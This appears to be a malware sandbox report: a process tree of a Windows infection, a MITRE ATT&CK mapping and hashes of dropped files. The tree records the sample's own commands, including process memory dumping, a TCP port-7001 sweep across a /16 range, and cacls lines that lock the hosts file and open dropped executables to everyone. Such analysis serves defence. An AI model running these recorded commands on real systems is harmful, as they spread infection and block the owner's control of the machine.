- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3692 C:\Windows\TEMP\ctvlnlili\3692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4636 C:\Windows\TEMP\ctvlnlili\4636.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3304 C:\Windows\TEMP\ctvlnlili\3304.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4776
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2204 C:\Windows\TEMP\ctvlnlili\2204.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ctvlnlili\rzvrtrlue\scan.bat2⤵PID:5028
-
C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exegepmrvmba.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4052
-
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5028 C:\Windows\TEMP\ctvlnlili\5028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6344
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3032 C:\Windows\TEMP\ctvlnlili\3032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:3756
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4504
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:60
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5112
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6400
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1936
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4364,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:81⤵PID:3116
-
C:\Windows\SysWOW64\yqiwma.exeC:\Windows\SysWOW64\yqiwma.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2008
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe1⤵PID:3180
-
C:\Windows\ime\ncnrnqz.exeC:\Windows\ime\ncnrnqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4620
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F1⤵PID:1056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3972
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F2⤵PID:4468
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F1⤵PID:2296
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3324
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F2⤵PID:3840
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\ncnrnqz.exe1⤵PID:4988
-
C:\Windows\ime\ncnrnqz.exeC:\Windows\ime\ncnrnqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6356
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F1⤵PID:5360
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1084
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F2⤵PID:6172
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F1⤵PID:5672
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:5456
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F2⤵PID:5076
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
8.7MB
MD51d3d84528cd7e2bbdb9408dbc0bb6a24
SHA1e1a50fb9b9c5b3c49ee2d36ae341bc76c0264a3f
SHA2560b9bd4f3155319b761bce9bc3d342b050a862e4f0df74031983825300381d039
SHA512d7629125d2560f28825335013cde089bee481b38c204b2d0d09502aaf1073a17c5961475c84c3cd9cb2ec47b0ca6550658893714edb09b131b7b72a7bb6b9f80
-
Filesize
26.0MB
MD58524ede669cd04382dd97d54b7f94eec
SHA15d73e7a69834febf83c76e1385ce53241a4bd351
SHA256d0b13b476e27fa006bd0360330aac203c13de686b21ed5c0f1a4913e5aa7b43f
SHA512afc99c6d7380020ef336c5a9c983b4b22d1a58652358bf432ba483e37995404dc99d62834ab5eea6fa234aee015ae750d275d1135293dfea0c56dd3fdaed38c2
-
Filesize
4.2MB
MD56db067f89734159704b6372be48a37fd
SHA1e36fa107fdee4aa95769a41b4bd5fdeda66eb76e
SHA256ee7fb8cf13f437516a33c6eb4e30eef972bc24bd1f02c3660dfe1b626b48426b
SHA512cf5a94e9a0b2e17b56d6004e7b4652895014a7fdca433f30ae82993fff3325fc7c1bead06f7e5f234912fa6df8725bf478bb78432f622be2fa5f857d0f598e43
-
Filesize
4.0MB
MD5a00caf68af5ad06e965955fc6952ce26
SHA1514000bb89280625cddd8cd3da6106eab3e71d4f
SHA256a169787caef47cf53787f3e7eea630cbfc6c343ea428f97321f6c78274b0b177
SHA51214e38f8a4ade3dd377bc80a0dda0aa954c32455362a01b145e9d28e21674fade755503344ed7d24ab2f965f40b7eed5dd849338809e05bce2d5ff932430c8e91
-
Filesize
2.9MB
MD5ce7c7157b12d6b1a36fe9dc09cebc8b7
SHA10e7a7002d6cb9b14de63051db116a442bf316c82
SHA256e4c660f1175601a0b35e4c51ae59246ff90aabf85692df0f3cace22508beba59
SHA51299d0bdf2ab47db0d4f572190af192cdbfd0854ae35e0907d8f60f6364864537956e2845717aa676e38ae0476124ba8443f37efccfeadeb293f6c458c6b17634f
-
Filesize
7.4MB
MD5f50d13cb5268a2aff23483835c65f2f0
SHA13167f93e6645551859f7a2b627256753568b6143
SHA2568ff31cd5028a6b0bfc5c5e7626b35e1a671d48f74bfc53d6cfa6c6443ace5d07
SHA51239b30f73d681760603efc4f52717e97e2c340a682048f5548583707e715c59d986fb3f2495a198fc16dac51b8c655ab70cedda920766ed1201730eeac4cefd94
-
Filesize
818KB
MD549646c57011396ce7b90acda845d9a3c
SHA1bede522ab6990773ea62066165add069a5b87b19
SHA2560b51f9f7ee208a42923d7269e3e9fc5b065a114b9c14e4f6b8ca0fd2471723ad
SHA512d06c861eb9048fa0126413c4b59be1c6709cc8eed390e7d8c22878690a7ab9c98e45479511df3447d7e5dac7265a965dab5e95257310d0056b37700a59acd7ae
-
Filesize
33.2MB
MD5f26c7e638e92a52484c13caf4549d301
SHA1f955669df79c00945a75f615039267c91db3ae33
SHA256400022e3036c2c418e80f704627f46e4b1d672ae33fbf58efb29f1f280059974
SHA512df32ef2efd2be1f0abd373334a35845de41c9a121abe9bbd9c371984900c02bce2b64253ba4709e315d74a761303476a4ac76a0876fe97540586fb9c849cff05
-
Filesize
27.5MB
MD512b34c6f436bf0f1346ffd5404d3661d
SHA1b32e667191c7f880c810a7176ab81cefae90e598
SHA25691418434c3f0957446f0d5226166730d48655d84c6f0e185fed2c2c95a3bab9e
SHA5129bf471a596463cfec6bce5daada93a3725ba3ba2e958444ceca36585102fa46673c2476f34831f64e7ecb416847aebe3cb68eb2ecb361be2fb897e844797fc26
-
Filesize
2.7MB
MD50d524e967027770a3f7c9c4c6f8923a4
SHA16b4643c6aacca967a89552b474b7b4bb58867b8d
SHA256969587d4423e97f5a6dc4d9e62574ea788aa7992659a54e7bc86fc4f8ed6c175
SHA5129aee34b170fb34a5dd6c6835f480c0efc7ca74f65bdde3b7d47bdc6d8e2c3a8fdba8e62ca02bb71e4ff746ce1e62bea798e343110faa6641b3a3a51bee6c3e17
-
Filesize
21.2MB
MD56e8e6bfdeba067c86e6237477d33761c
SHA18cd35668b98447fceaff24e6d4aa5c34a3f71bae
SHA256ffdefacaa235fc8a0042b9b8cde7a8012e5323c7c385ae5ba786788f2ce823a1
SHA512554be954c472db7d9a06f0a9e9c22b73b230984fbab171750b1d700d4f52d5f6f56112724056483243074ebea91cdd1083fa5ab966eb916aaff2b7a17b00d536
-
Filesize
8.5MB
MD530dc1e2781c7eb0229b1c5db8728fb98
SHA1181af92a72077591820de8de1d2aae47d9e763d5
SHA2566b7aa686bcd8e5a21fe8eed8a0499d9e2a10bf1ff8f16bc15a3b68f1e30dc62d
SHA512e038ae344402f769ec8b13eb3d35314ee7d018c9133870c4687896dc67ff9ca0ed09e5b5af5e9af7231d3d18f04dd2a5e9981539a126d0a90e2ba01c7d22585d
-
Filesize
1.2MB
MD51e24fde6b3327b3b3deca0c64fc0732c
SHA16f926277397cef74a0c46c6175905ea191d6bcad
SHA256607a52498be3eaae216c2f0dac12e0b4577e7070f6b22ff28b6860c56bbb75e1
SHA5129d63d520f9ee32d1b9bbe9da7bbf5d00198cbb733c417ea6b6a5140f8f77c6eb59bbe548b6ab2cf40a45169048462fffeecbad293ce6c597ef6f64581f538ac4
-
Filesize
45.7MB
MD5501d63126c961970990282cf95a90dfc
SHA190bb108d3ec752d9067ff3d714bb74c4a375bc65
SHA25617e370be44e511e5b5991313cfeec7466bd6daa70324b78f039e171b59ea41b0
SHA51260871a5e8c744556f7190b65c9ed57fa276b5063adef8ef90a99587ef0cc95bda6b0143a66fdea1b055b875cb060fa98dd3c6525a793564a2d640d6eb0ad7ee1
-
Filesize
2.0MB
MD5d18230cea201e4e46992765d7e2efa98
SHA1af10670bb633523480a6427cc04953e395e2df99
SHA2564aef71d7afdff23b65384fd7c20a5d88dae6bbd5e18c85665214954657f765c1
SHA5129483526662360848209f57a6dd2684fcb52fb9afa9981e5c1b0a46e678c574aeac668629f5527aabbb8d3eefd3caffb82dcde9d9a3f24b1a6c7c997858074077
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
9.1MB
MD5a5d01a4f4e42451c38ad484115c3988f
SHA1d837ccc8e38dde0c235129ff6b4018fa2e552e52
SHA2560d24654b670633b65402b2ff56b0a6262eb2810560594db8287b113285bd6956
SHA512a336b8dbbcc788a4a2f329998ddc6f67128c87e4aa01ec60a2c08d3393096d4d0609b046fc231b303c47f412c487414ddf459150698a240bfdd97c0232ac0b9d
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376